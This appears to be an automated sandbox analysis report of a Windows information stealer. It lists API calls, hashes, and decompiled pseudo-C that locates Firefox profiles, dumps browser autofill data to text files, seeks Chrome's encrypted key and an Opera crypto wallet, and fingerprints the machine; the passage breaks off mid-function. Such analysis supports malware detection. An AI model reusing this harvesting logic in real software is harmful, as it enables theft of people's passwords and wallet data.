Part of subcall function 0040AA30: _strlen.LIBCMT ref: 0040AA4E

_strlen.LIBCMT ref: 0040F001

Part of subcall function 0040A870: _strlen.LIBCMT ref: 0040A88E

Part of subcall function 0040E910: StrCmpCA.SHLWAPI(00000000), ref: 0040E974

StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F056
StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F07C
StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F0A2
StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F0C8
StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F16D
StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F223
StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F2C8
_strlen.LIBCMT ref: 0040F317
_strlen.LIBCMT ref: 0040F1BC

Part of subcall function 00404AD0: std::_Xinvalid_argument.LIBCPMT ref: 00404AEA

Part of subcall function 0040E910: StrCmpCA.SHLWAPI(?,ERROR,00000000), ref: 0040EA84

StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F37E
StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F3A4
StrCmpCA.SHLWAPI(025CA500,ERROR), ref: 0040F3CA
Sleep.KERNEL32(0000EA60), ref: 0040F3D9

Part of subcall function 0040A9F0: _strlen.LIBCMT ref: 0040AA0E

Part of subcall function 00404D00: _memmove.LIBCMT ref: 00404D3D

Part of subcall function 0040A8B0: _strlen.LIBCMT ref: 0040A8CE

Strings

ERROR, xrefs: 0040F050, 0040F076, 0040F09C, 0040F0C2, 0040F167, 0040F21D, 0040F2C2, 0040F378, 0040F39E, 0040F3C4
%, xrefs: 0040F65A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$SleepXinvalid_argument_memmove_memsetlstrcatstd::_
String ID: %$ERROR
API String ID: 718048070-4034856889
Opcode ID: 10f4ffb7e2de6b827890a6ef0bb4ad4ceff794b19d7c8018127874a7a2967082
Instruction ID: 65d56a2ffb6402fe4c6053c35bccc2ff54ce4f3e327d725ee6f483675e3218dd
Opcode Fuzzy Hash: 10f4ffb7e2de6b827890a6ef0bb4ad4ceff794b19d7c8018127874a7a2967082
Instruction Fuzzy Hash: 88227EB1900218EBCB20FF55ED45BDA77B8AB55309F0040BEE50977292EB785B48CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 004099E0 Relevance: 31.6, APIs: 21, Instructions: 141memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0000EA60), ref: 004099EE
RtlAllocateHeap.NTDLL(00000000), ref: 004099F5
lstrcat.KERNEL32(00000000,?), ref: 00409A02
_strtok_s.LIBCMT ref: 00409A1A
StrCmpCA.SHLWAPI(00000000,00445698), ref: 00409A54
StrCmpCA.SHLWAPI(00000000,00445698), ref: 00409A73
StrCmpCA.SHLWAPI(00000000,00445698), ref: 00409A92
StrCmpCA.SHLWAPI(00000000,00445698), ref: 00409AB1
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00409AD1
RtlAllocateHeap.NTDLL(00000000), ref: 00409AD8
lstrcat.KERNEL32(00000000,00000000), ref: 00409AE5
StrCmpCA.SHLWAPI(00000000,00445698), ref: 00409AF6
StrCmpCA.SHLWAPI(00000000,00445698), ref: 00409B15
StrCmpCA.SHLWAPI(00000000,00445698), ref: 00409B34
StrCmpCA.SHLWAPI(00000000,00445698), ref: 00409B4C
StrCmpCA.SHLWAPI(00000000,00445698), ref: 00409B64
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00409B7D
RtlAllocateHeap.NTDLL(00000000), ref: 00409B84
lstrcat.KERNEL32(00000000,00000000), ref: 00409B91
StrCmpCA.SHLWAPI(00000000,00445694), ref: 00409B9F
_strtok_s.LIBCMT ref: 00409BB8

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcat$_strtok_s
String ID:
API String ID: 838663909-0
Opcode ID: 9c2e5a9d14dff673c0ff975d4622fc81530f353707aad07d7a3881358133c641
Instruction ID: 94db18e6e95342d93617148965c77af73cc8fb05f4dae46c55bcf0e8021b07a6
Opcode Fuzzy Hash: 9c2e5a9d14dff673c0ff975d4622fc81530f353707aad07d7a3881358133c641
Instruction Fuzzy Hash: 01411635249744ABDB12AF64BC09E6A3AB8FF927527010036F40AB3193F67ED900975E

Uniqueness

Uniqueness Score: -1.00%

Function 00417B80 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00417B80(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v529;
				intOrPtr _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				void* _t33;
				int _t52;
				intOrPtr _t55;
				struct HINSTANCE__* _t70;
				void* _t79;
				intOrPtr _t80;
				signed int _t81;

				_t28 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t28 ^ _t81;
				_t59 = _a8;
				_t80 = _a4;
				_t79 = __ecx;
				_v536 = _a12;
				E0042A2F0( &_v528, 0, 0x104);
				E0042A2F0( &_v268, 0, 0x104);
				_t33 = E00420650(_a8, _t79, _t80, 0x1a); // executed
				 *0x464860( &_v528, _t33);
				 *0x464860( &_v528, _t80);
				 *0x464860( &_v268,  &_v528);
				 *0x464860( &_v268, "..\\");
				 *0x464860( &_v268, "p");
				 *0x464860( &_v268, "r");
				 *0x464860( &_v268, "o");
				 *0x464860( &_v268, "f");
				 *0x464860( &_v268, "i");
				 *0x464860( &_v268, "l");
				 *0x464860( &_v268, "e");
				 *0x464860( &_v268, "s");
				 *0x464860( &_v268, ".ini");
				_t78 =  &_v268;
				_t52 = E004205C0( &_v268); // executed
				_t86 = _t52;
				if(_t52 != 0) {
					E0040EB80(_t86);
					_t55 =  *0x453978; // 0x25c13d0
					if(E004179D0(_t59, _t79, _t55) != 0) {
						_t78 =  *((intOrPtr*)(_t79 + 0x20));
						E004162F0(_t79, 0x443c1c,  &_v528, _t59,  *((intOrPtr*)(_t79 + 0x20)), _v536);
					}
					_t70 =  *0x453db0; // 0x0
					_t52 = FreeLibrary(_t70);
				}
				return E0042A36A(_t52, _t59, _v8 ^ _t81, _t78, _t79, _t80);
			}

0x00417b89
0x00417b90
0x00417b97
0x00417b9b
0x00417ba4
0x00417baf
0x00417bb5
0x00417bc8
0x00417bcf
0x00417bdf
0x00417bed
0x00417c01
0x00417c13
0x00417c25
0x00417c37
0x00417c49
0x00417c5b
0x00417c6d
0x00417c7f
0x00417c91
0x00417ca3
0x00417cb5
0x00417cbb
0x00417cc8
0x00417ccd
0x00417ccf
0x00417cd1
0x00417cd6
0x00417ce6
0x00417cee
0x00417d02
0x00417d02
0x00417d07
0x00417d0e
0x00417d0e
0x00417d24

APIs

_memset.LIBCMT ref: 00417BB5
_memset.LIBCMT ref: 00417BC8

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

lstrcat.KERNEL32(?,00000000), ref: 00417BDF
lstrcat.KERNEL32(?,025C6320), ref: 00417BED
lstrcat.KERNEL32(?,?), ref: 00417C01
lstrcat.KERNEL32(?,..\), ref: 00417C13
lstrcat.KERNEL32(?,00446324), ref: 00417C25
lstrcat.KERNEL32(?,00445A7C), ref: 00417C37
lstrcat.KERNEL32(?,00445A40), ref: 00417C49
lstrcat.KERNEL32(?,00446320), ref: 00417C5B
lstrcat.KERNEL32(?,00445A4C), ref: 00417C6D
lstrcat.KERNEL32(?,00445A6C), ref: 00417C7F
lstrcat.KERNEL32(?,00445A78), ref: 00417C91
lstrcat.KERNEL32(?,00445A44), ref: 00417CA3
lstrcat.KERNEL32(?,.ini), ref: 00417CB5

Part of subcall function 004205C0: GetFileAttributesA.KERNEL32(0040B658,?,0040B658,?), ref: 004205C7

Part of subcall function 0040EB80: _strlen.LIBCMT ref: 0040EBC5
Part of subcall function 0040EB80: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,025C13D0,00000000), ref: 0040EC3C
Part of subcall function 0040EB80: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,025C13D0,00000000), ref: 0040EC43

Part of subcall function 004179D0: GetEnvironmentVariableA.KERNEL32(PATH,00453E08,0000FFFF,025C6320,?,00417CE1,025C13D0,?,?,?,?,?,00000000,?,00000000), ref: 00417A02
Part of subcall function 004179D0: _memset.LIBCMT ref: 00417A16
Part of subcall function 004179D0: lstrcat.KERNEL32(?,00453E08), ref: 00417A2A
Part of subcall function 004179D0: lstrcat.KERNEL32(?,004459AC), ref: 00417A3C
Part of subcall function 004179D0: lstrcat.KERNEL32(?,025C13D0), ref: 00417A4A
Part of subcall function 004179D0: SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,?,?,00000000,?,00000000), ref: 00417A5C
Part of subcall function 004179D0: _memset.LIBCMT ref: 00417A70
Part of subcall function 004179D0: LoadLibraryA.KERNEL32(025C5CA0,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00417A7E
Part of subcall function 004179D0: GetProcAddress.KERNEL32(00000000,025C6140), ref: 00417A99
Part of subcall function 004179D0: GetProcAddress.KERNEL32(00000000,025C6F78), ref: 00417AB1
Part of subcall function 004179D0: GetProcAddress.KERNEL32(00000000,025C5E40), ref: 00417ACA
Part of subcall function 004179D0: GetProcAddress.KERNEL32(00000000,025C6F90), ref: 00417AE2
Part of subcall function 004179D0: GetProcAddress.KERNEL32(00000000,025C5F60), ref: 00417AFA
Part of subcall function 004179D0: GetProcAddress.KERNEL32(00000000,025C6F60), ref: 00417B13

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,00000000,?,00000000), ref: 00417D0E

Part of subcall function 004162F0: wsprintfA.USER32 ref: 00416334
Part of subcall function 004162F0: FindFirstFileA.KERNEL32(?,?), ref: 0041634B
Part of subcall function 004162F0: StrCmpCA.SHLWAPI(?,004456B0), ref: 0041636C
Part of subcall function 004162F0: StrCmpCA.SHLWAPI(?,004456AC), ref: 00416386
Part of subcall function 004162F0: wsprintfA.USER32 ref: 004163AE
Part of subcall function 004162F0: StrCmpCA.SHLWAPI(?,025C9E08), ref: 004163C4
Part of subcall function 004162F0: FindNextFileA.KERNEL32(?,?), ref: 004164D0
Part of subcall function 004162F0: FindClose.KERNEL32(?), ref: 004164E5

Strings

..\, xrefs: 00417C07
.ini, xrefs: 00417CA9

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$AddressProc$_memset$FileFind$EnvironmentHeapLibraryVariablewsprintf$AllocAttributesCloseFirstFolderFreeLoadNextPathProcess_strlen
String ID: ..\$.ini
API String ID: 1131942875-2443844595
Opcode ID: 4191d3a295ed2f5d5c7cebbbb828ad371298707137a218e289836d2eb0e49104
Instruction ID: ccf59845dd2055a18fdfb73fc0644c59e2ae75c7cfbf6e16ede698ac2d5d600e
Opcode Fuzzy Hash: 4191d3a295ed2f5d5c7cebbbb828ad371298707137a218e289836d2eb0e49104
Instruction Fuzzy Hash: E941D97A60421CABCF50FFA1EC49FD97378BB99700F00499AF64593041EBB49684CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00415200 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 149
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00415200(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				char _v536;
				void* _v537;
				char _v544;
				intOrPtr _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				void* _t49;
				int _t51;
				long _t53;
				void* _t57;
				void* _t59;
				void* _t73;
				intOrPtr _t87;
				intOrPtr _t95;
				intOrPtr _t97;
				signed int _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;

				_t36 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t36 ^ _t98;
				_t74 = _a12;
				_t95 = _a8;
				_v548 = _a24;
				E0042A2F0( &_v268, 0, 0x104);
				_t87 =  *0x453978; // 0x25c13d0
				 *0x464860( &_v268, _t87);
				 *0x464860( &_v268, E00420520(_t95, _t107, 0x1a));
				CopyFileA(_a4,  &_v268, 1); // executed
				E0042A2F0( &_v528, 0, 0x104);
				wsprintfA( &_v528, "\\Autofill\\%s_%s.txt", _a12, _t95);
				_t97 =  *0x453aa4; // 0x25c15c8
				_t89 =  &_v544;
				_t49 =  *0x453dbc( &_v268,  &_v544); // executed
				_t101 = _t99 + 0x30;
				if(_t49 == 0) {
					_t53 =  *0x453d68(_v544, _t97, 0xffffffff,  &_v536, _t49); // executed
					_t102 = _t101 + 0x14;
					if(_t53 == 0) {
						_t57 = RtlAllocateHeap(GetProcessHeap(), _t53, 0xf423f); // executed
						_v532 = _t57;
						_t59 =  *0x453d84(_v536);
						_t104 = _t102 + 4;
						if(_t59 == 0x64) {
							do {
								 *0x464860(_v532,  *0x453da8(_v536, 0));
								 *0x464860(_v532, " ");
								 *0x464860(_v532,  *0x453da8(_v536, 1));
								 *0x464860(_v532, "\n");
								_t73 =  *0x453d84(_v536);
								_t104 = _t104 + 0x14;
							} while (_t73 == 0x64);
						}
						E00429620(_v548,  &_v528, _v532,  *0x464758(_v532));
						E0042A2F0( &_v532, 0, 4);
						_t102 = _t104 + 0x1c;
					}
					 *0x453d88(_v536);
					_t89 = _v544;
					 *0x453dc0(_v544);
				}
				_t51 = DeleteFileA( &_v268); // executed
				return E0042A36A(_t51, _t74, _v8 ^ _t98, _t89, _t95, _t97);
			}

0x00415209
0x00415210
0x00415217
0x0041521f
0x00415230
0x00415236
0x0041523b
0x0041524c
0x00415267
0x00415277
0x0041528b
0x0041529e
0x004152a4
0x004152aa
0x004152b8
0x004152be
0x004152c3
0x004152db
0x004152e1
0x004152e6
0x004152f9
0x004152ff
0x0041530c
0x00415312
0x00415318
0x00415320
0x0041533a
0x0041534c
0x0041536c
0x0041537e
0x0041538b
0x00415391
0x00415394
0x00415320
0x004153bc
0x004153cc
0x004153d1
0x004153d1
0x004153db
0x004153e1
0x004153e8
0x004153ee
0x004153f8
0x0041540e

APIs

_memset.LIBCMT ref: 00415236
lstrcat.KERNEL32(?,025C13D0), ref: 0041524C

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 00415267
CopyFileA.KERNEL32(?,?,00000001), ref: 00415277
_memset.LIBCMT ref: 0041528B
wsprintfA.USER32 ref: 0041529E
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004152F2
RtlAllocateHeap.NTDLL(00000000), ref: 004152F9
lstrcat.KERNEL32(?,00000000), ref: 0041533A
lstrcat.KERNEL32(?,00445E2C), ref: 0041534C
lstrcat.KERNEL32(?,00000000), ref: 0041536C
lstrcat.KERNEL32(?,00443C5C), ref: 0041537E
lstrlen.KERNEL32(?), ref: 004153A0
_memset.LIBCMT ref: 004153CC
DeleteFileA.KERNEL32(?), ref: 004153F8

Strings

\Autofill\%s_%s.txt, xrefs: 00415298
ZHaZea, xrefs: 0041530C, 0041538B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocateCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\Autofill\%s_%s.txt
API String ID: 3235818882-2263976030
Opcode ID: 0d55c65a075291b2ef84a14df1d3369eab64e64c916ac0e349d895262fde21d0
Instruction ID: bfe6b3621e16dcfc25a78eeb03a73335f19de8124209b84c5cf4826ac11ad9fd
Opcode Fuzzy Hash: 0d55c65a075291b2ef84a14df1d3369eab64e64c916ac0e349d895262fde21d0
Instruction Fuzzy Hash: B05175B594031CABCB10EF64EC89FDA7778BF99701F0045A9F50993141DBB4AA84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3E0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 220
stringCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0041C3E0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v540;
				char _v800;
				intOrPtr _v808;
				char _v812;
				char _v828;
				intOrPtr _v836;
				char _v840;
				short _v856;
				char _v857;
				char _v864;
				char _v868;
				char _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t75;
				void* _t81;
				intOrPtr _t97;
				void* _t99;
				intOrPtr* _t102;
				void* _t103;
				intOrPtr _t107;
				intOrPtr _t108;
				void* _t120;
				void* _t122;
				intOrPtr _t126;
				intOrPtr _t147;
				void* _t156;
				intOrPtr _t157;
				intOrPtr _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t165;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t172;

				_t74 =  *0x451f00; // 0xc21d6f0a
				_t75 = _t74 ^ _t166;
				_v20 = _t75;
				 *[fs:0x0] =  &_v16;
				_t157 = _a4;
				_t162 = _a12;
				_v876 = __ecx;
				_v880 = _a8;
				_v884 = _a16;
				_v864 = 0;
				_v868 = 0;
				E0042A2F0( &_v540, 0, 0x104);
				E0042A2F0( &_v800, 0, 0x104);
				_t81 = E00420650(0, _t157, _t162, 0x1a);
				_t169 = _t167 - 0x364 + 0x1c;
				 *0x464860( &_v540, _t81, _t75, _t156, _t161, _t120,  *[fs:0x0], E0043F186, 0xffffffff);
				 *0x464860( &_v540, _t157);
				 *0x464860( &_v540, _t162);
				_t126 =  *0x453980; // 0x25c9228
				_push(_t126);
				_push(_t162);
				_v872 = 0;
				if( *0x464890() == 0) {
					_v872 = 1;
				}
				_t147 =  *0x4533d8; // 0x25c7268
				_push(_t147);
				_push(_t162);
				if( *0x464890() == 0) {
					_v872 = 2;
				}
				_push("Opera Crypto Stable");
				_push(_t162);
				if( *0x464890() == 0) {
					_v872 = 3;
				}
				 *0x464860( &_v800, E00420650(0, _t157, _t162, 0x1a));
				 *0x464860( &_v800, _t157);
				E0042A2F0( &_v280, 0, 0x104);
				 *0x464860( &_v280,  &_v540);
				 *0x464860( &_v280, "\\");
				_t97 =  *0x453630; // 0x25c61e8
				 *0x464860( &_v280, _t97);
				_v808 = 0xf;
				_v812 = 0;
				_v828 = 0;
				_t99 = E0042BC70( &_v280);
				_t172 = _t169 + 0x14;
				E00404BC0( &_v828,  &_v280, _t99);
				_v8 = 0;
				_t102 = E00423960( &_v857,  &_v856,  &_v828);
				_v8 = 1;
				if( *((intOrPtr*)(_t102 + 0x14)) >= 8) {
					_t102 =  *_t102;
				}
				_t103 = E00420590(_t102); // executed
				_t163 = _t103;
				if(_v836 >= 8) {
					_push(_v856);
					E0042A289();
					_t172 = _t172 + 4;
				}
				_v836 = 7;
				_v840 = 0;
				_v856 = 0;
				_v8 = 0xffffffff;
				if(_v808 >= 0x10) {
					_push(_v828);
					E0042A289();
					_t172 = _t172 + 4;
				}
				_v808 = 0xf;
				_v812 = 0;
				_v828 = 0;
				if(_t163 != 0 && E004199D0(8,  &_v280,  &_v864,  &_v868) == 0) {
					E004150C0( &_v864,  &_v868);
				}
				_t159 = _v876;
				_t164 = _v880;
				_t153 = _v868;
				E0041AFF0(_t159, 0x443c1c,  &_v540, _v880, _v864, _v868,  *((intOrPtr*)(_t159 + 0x20)), _v884, _a20); // executed
				if( *((intOrPtr*)(_t159 + 6)) != 0) {
					_t153 = _v872;
					E00417100(_t159,  &_v800, _t164, _v872); // executed
				}
				_t107 = _v864;
				if(_t107 != 0) {
					 *0x4647a4(_t107, 0);
					_v864 = 0;
				}
				_t108 = _v868;
				if(_t108 != 0) {
					_t108 =  *0x464858(_t108);
				}
				 *[fs:0x0] = _v16;
				_pop(_t160);
				_pop(_t165);
				_pop(_t122);
				return E0042A36A(_t108, _t122, _v20 ^ _t166, _t153, _t160, _t165);
			}

0x0041c3f7
0x0041c3fc
0x0041c3fe
0x0041c408
0x0041c411
0x0041c414
0x0041c41e
0x0041c42f
0x0041c435
0x0041c43b
0x0041c441
0x0041c447
0x0041c459
0x0041c460
0x0041c465
0x0041c470
0x0041c47e
0x0041c48c
0x0041c492
0x0041c498
0x0041c499
0x0041c49a
0x0041c4a8
0x0041c4aa
0x0041c4aa
0x0041c4b4
0x0041c4ba
0x0041c4bb
0x0041c4c4
0x0041c4c6
0x0041c4c6
0x0041c4d0
0x0041c4d5
0x0041c4de
0x0041c4e0
0x0041c4e0
0x0041c4fc
0x0041c50a
0x0041c51d
0x0041c533
0x0041c545
0x0041c54b
0x0041c558
0x0041c565
0x0041c56f
0x0041c575
0x0041c57b
0x0041c580
0x0041c591
0x0041c5aa
0x0041c5ad
0x0041c5b7
0x0041c5be
0x0041c5c0
0x0041c5c0
0x0041c5c9
0x0041c5ce
0x0041c5d6
0x0041c5de
0x0041c5df
0x0041c5e4
0x0041c5e4
0x0041c5f0
0x0041c5fa
0x0041c600
0x0041c607
0x0041c60e
0x0041c616
0x0041c617
0x0041c61c
0x0041c61c
0x0041c61f
0x0041c629
0x0041c62f
0x0041c637
0x0041c668
0x0041c66d
0x0041c679
0x0041c682
0x0041c689
0x0041c6a8
0x0041c6b0
0x0041c6b2
0x0041c6c3
0x0041c6c3
0x0041c6c8
0x0041c6d0
0x0041c6d4
0x0041c6da
0x0041c6da
0x0041c6e0
0x0041c6e8
0x0041c6eb
0x0041c6eb
0x0041c6f4
0x0041c6fc
0x0041c6fd
0x0041c6fe
0x0041c70c

APIs

_memset.LIBCMT ref: 0041C447
_memset.LIBCMT ref: 0041C459

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

lstrcat.KERNEL32(?,00000000), ref: 0041C470
lstrcat.KERNEL32(?,025C6320), ref: 0041C47E
lstrcat.KERNEL32(?,?), ref: 0041C48C
StrCmpCA.SHLWAPI(?,025C9228,?,?,?,C21D6F0A,00000000,?,00000000), ref: 0041C4A0
StrCmpCA.SHLWAPI(?,025C7268,?,?,?,C21D6F0A,00000000,?,00000000), ref: 0041C4BC
StrCmpCA.SHLWAPI(?,Opera Crypto Stable,?,?,?,C21D6F0A,00000000,?,00000000), ref: 0041C4D6
lstrcat.KERNEL32(?,00000000), ref: 0041C4FC
lstrcat.KERNEL32(?,025C6320), ref: 0041C50A
_memset.LIBCMT ref: 0041C51D
lstrcat.KERNEL32(?,?), ref: 0041C533
lstrcat.KERNEL32(?,00443C68), ref: 0041C545
lstrcat.KERNEL32(?,025C61E8), ref: 0041C558
_strlen.LIBCMT ref: 0041C57B

Part of subcall function 004199D0: StrStrA.SHLWAPI(00000000,encrypted_key,?,?,C21D6F0A,?,00000000,?,0043EEE8,000000FF,?,0040AF01,?,?,?,00000000), ref: 00419A42
Part of subcall function 004199D0: _strlen.LIBCMT ref: 00419A63
Part of subcall function 004199D0: _strlen.LIBCMT ref: 00419A7D
Part of subcall function 004199D0: _memcmp.LIBCMT ref: 00419AD6

Strings

Opera Crypto Stable, xrefs: 0041C4D0

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$_strlen$FolderPath_memcmp
String ID: Opera Crypto Stable
API String ID: 1920591721-2665741402
Opcode ID: 79b31afa347063e7bbb3e423415f821619caca7dbc3263b3d61a9005c2f3290d
Instruction ID: c00d747908092adf1e76ae0345bbb946a3592b081830d2b167714f914fea00ed
Opcode Fuzzy Hash: 79b31afa347063e7bbb3e423415f821619caca7dbc3263b3d61a9005c2f3290d
Instruction Fuzzy Hash: 41914FB290022CABCB25DF50DC85AEAB7BCBB49704F0045DEF509A3251EA759B84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041F8E0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 350
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041F8E0(intOrPtr __ecx, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				long _v288;
				long _v292;
				long _v308;
				intOrPtr _v314;
				intOrPtr _v316;
				long _v320;
				intOrPtr _v324;
				char _v336;
				intOrPtr _v344;
				long _v348;
				char _v364;
				intOrPtr _v372;
				long _v376;
				char _v392;
				intOrPtr _v400;
				long _v404;
				char _v420;
				intOrPtr _v428;
				long _v432;
				char _v448;
				intOrPtr _v456;
				char _v476;
				long _v480;
				char _v481;
				short _v483;
				char _v484;
				long _v488;
				long* _v492;
				intOrPtr _v496;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t133;
				signed int _t134;
				intOrPtr _t140;
				void* _t149;
				long _t151;
				void* _t152;
				void* _t153;
				void* _t155;
				void* _t156;
				void* _t158;
				long* _t159;
				intOrPtr _t185;
				intOrPtr* _t186;
				char* _t190;
				long _t194;
				void* _t195;
				void* _t197;
				signed char* _t205;
				signed char* _t206;
				intOrPtr* _t238;
				void* _t239;
				void* _t241;
				CHAR* _t242;
				signed char* _t243;
				long* _t245;
				void* _t246;
				long _t247;
				signed int _t248;
				void* _t249;
				void* _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t261;

				_push(0xffffffff);
				_push(E0043F55D);
				_push( *[fs:0x0]);
				_t250 = _t249 - 0x1e0;
				_t133 =  *0x451f00; // 0xc21d6f0a
				_t134 = _t133 ^ _t248;
				_v20 = _t134;
				_push(_t134);
				 *[fs:0x0] =  &_v16;
				_t238 = _a4;
				_t194 = 0;
				_v488 = 0;
				_v496 = __ecx;
				_v480 = 0;
				_v288 = 0xf;
				_v292 = 0;
				_v308 = 0;
				_v8 = 0;
				if(GetWindowsDirectoryA( &_v280, 0x104) == 0) {
					_v280 = 0x43;
				}
				_v484 = _v280;
				_v483 = 0x5c3a;
				_v481 = 0;
				GetVolumeInformationA( &_v484, _t194, _t194,  &_v480, _t194, _t194, _t194, _t194); // executed
				_t140 = E00420420( &_v480);
				_t228 =  &_v480;
				_v324 = _t140;
				_v320 = E00420420( &_v480);
				E00420420( &_v480);
				_t251 = _t250 + 0xc;
				_t241 = 0;
				do {
					 *((char*)(_t248 + _t241 - 0x138)) = E00420420( &_v480);
					_t241 = _t241 + 1;
					_t251 = _t251 + 4;
				} while (_t241 < 8);
				_t242 = HeapAlloc(GetProcessHeap(), _t194, 0x104);
				if(_t242 != _t194) {
					wsprintfA(_t242, "%08lX%04lX%lu-", _v324, _v320 & 0x0000ffff, _v314);
					_t149 = E0042BC70(_t242);
					_t252 = _t251 + 0x18;
					E0040A4B0( &_v308, _t242, _t149);
					_t151 = _v288;
					_t243 = _v308;
					if(_t151 < 0x10) {
						_v492 =  &_v308;
					} else {
						_v492 = _t243;
					}
					_t205 = _t243;
					if(_t151 < 0x10) {
						_t205 =  &_v308;
					}
					_t206 =  &(_t205[_v292]);
					_v488 = _t206;
					if(_t151 < 0x10) {
						_t243 =  &_v308;
					}
					if(_t243 == _t206) {
						L35:
						_t152 = E0041F540(_t194, _t238,  &_v476); // executed
						_v8 = 1;
						_t153 = E0040D070(_t152,  &_v448, 0x14, 0x11);
						_v8 = 2;
						_t155 = E0041F5C0(_t194, _t238,  &_v420); // executed
						_v8 = 3;
						_t156 = E0040D070(_t155,  &_v392, _t194, 0x18);
						_v8 = 4;
						_t158 = E0041F890(_t155,  &_v364,  &_v308, _t156);
						_v8 = 5;
						_t159 = E00404E00( &_v336,  &_v336, _t158, _t153);
						_t253 = _t252 + 0x18;
						_t245 = _t159;
						if( &_v308 != _t245) {
							if(_v288 >= 0x10) {
								_push(_v308);
								E0042A289();
								_t253 = _t253 + 4;
							}
							_v288 = 0xf;
							_v292 = _t194;
							_v308 = 0;
							if(_t245[5] >= 0x10) {
								_v308 =  *_t245;
								 *_t245 = _t194;
							} else {
								E0042C040( &_v308, _t245, _t245[4] + 1);
